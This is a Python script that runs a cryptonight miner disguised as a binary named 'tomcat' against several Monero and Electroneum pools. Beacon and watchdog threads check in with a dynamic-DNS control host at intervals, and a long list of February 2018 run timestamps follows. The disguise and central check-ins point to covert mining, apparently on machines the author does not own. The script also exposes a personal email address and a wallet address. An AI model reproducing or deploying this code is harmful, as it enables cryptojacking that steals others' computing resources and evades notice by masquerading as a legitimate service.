import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:44:01.234353
#2018-02-17 16:32:04.131098
#2018-02-17 18:19:06.961598
#2018-02-17 20:07:06.221789
#2018-02-17 21:54:03.887211
#2018-02-17 23:39:05.180367
#2018-02-18 01:28:06.862131
#2018-02-18 03:15:03.907150
#2018-02-18 05:04:03.809983
#2018-02-18 06:56:05.706548
#2018-02-18 08:46:05.481156
#2018-02-18 10:33:05.435386
#2018-02-18 12:18:05.251606
#2018-02-18 14:05:08.068594
#2018-02-18 15:57:02.206091
#2018-02-18 17:46:07.458347
#2018-02-18 19:34:07.131942
#2018-02-18 21:19:04.755779
#2018-02-18 23:07:04.961033
#2018-02-19 00:54:01.576475
#2018-02-19 02:41:05.178012
#2018-02-19 04:28:07.809716
#2018-02-19 06:13:05.877738
#2018-02-19 08:01:01.840590
#2018-02-19 09:51:03.937037
#2018-02-19 11:39:04.396967
#2018-02-19 13:26:01.596930
#2018-02-19 15:14:01.747125
#2018-02-19 17:02:04.658511
#2018-02-19 18:48:03.965736
#2018-02-19 20:36:05.238994
#2018-02-19 22:22:07.317688
#2018-02-20 00:07:05.401757
#2018-02-20 01:55:07.584983
#2018-02-20 03:44:03.403059
#2018-02-20 05:30:09.817352
#2018-02-20 07:14:07.878194
#2018-02-20 09:01:01.371083
#2018-02-20 10:43:11.217172
#2018-02-20 12:29:08.910691
#2018-02-20 14:15:11.673191
#2018-02-20 15:58:04.018297
#2018-02-20 17:45:15.930189
#2018-02-20 19:38:07.403030
#2018-02-20 21:23:05.159470
#2018-02-20 23:07:06.394824
#2018-02-21 00:51:06.507381
#2018-02-21 02:36:01.816295
#2018-02-21 04:24:07.184890
#2018-02-21 06:12:01.671061
#2018-02-21 07:57:01.314389
#2018-02-21 09:42:04.126115
#2018-02-21 11:31:08.366813
#2018-02-21 13:19:01.879639
#2018-02-21 15:04:02.240212
#2018-02-21 16:54:01.496159
#2018-02-21 18:40:12.030294
#2018-02-21 20:25:01.464872
#2018-02-21 22:13:04.090945
#2018-02-22 00:03:01.440786
#2018-02-22 01:51:03.974780
#2018-02-22 03:38:07.803118
#2018-02-22 05:25:08.054820
#2018-02-22 07:10:08.590348
#2018-02-22 08:57:01.908425
#2018-02-22 10:45:01.476634
#2018-02-22 12:30:14.491162
#2018-02-22 14:16:08.776457
#2018-02-22 16:05:10.692487
#2018-02-22 17:51:02.211224
#2018-02-22 19:37:06.227932
#2018-02-22 21:30:05.634517
#2018-02-22 23:17:03.685490
#2018-02-23 01:04:03.649527
#2018-02-23 02:52:01.384868
#2018-02-23 04:39:06.065363
#2018-02-23 06:25:03.794410
#2018-02-23 08:12:08.706588
#2018-02-23 10:27:01.262570
#2018-02-23 12:20:07.950162
#2018-02-23 14:08:07.537007
#2018-02-23 15:57:07.812541
#2018-02-23 17:42:08.546165
#2018-02-23 19:29:04.199845
#2018-02-23 21:13:05.383877
#2018-02-23 22:59:02.163215
#2018-02-24 00:46:01.217058
#2018-02-24 02:40:05.720579
#2018-02-24 04:34:02.070993
#2018-02-24 06:19:01.787881
#2018-02-24 08:07:01.932290
#2018-02-24 09:51:06.894467
#2018-02-24 11:46:01.272613
#2018-02-24 13:37:06.735929
#2018-02-24 15:24:06.807692
#2018-02-24 17:14:01.875747
#2018-02-24 19:05:05.915900
#2018-02-24 20:53:03.527874
#2018-02-24 23:13:04.798115
#2018-02-25 03:22:05.882881
#2018-02-25 06:51:02.134770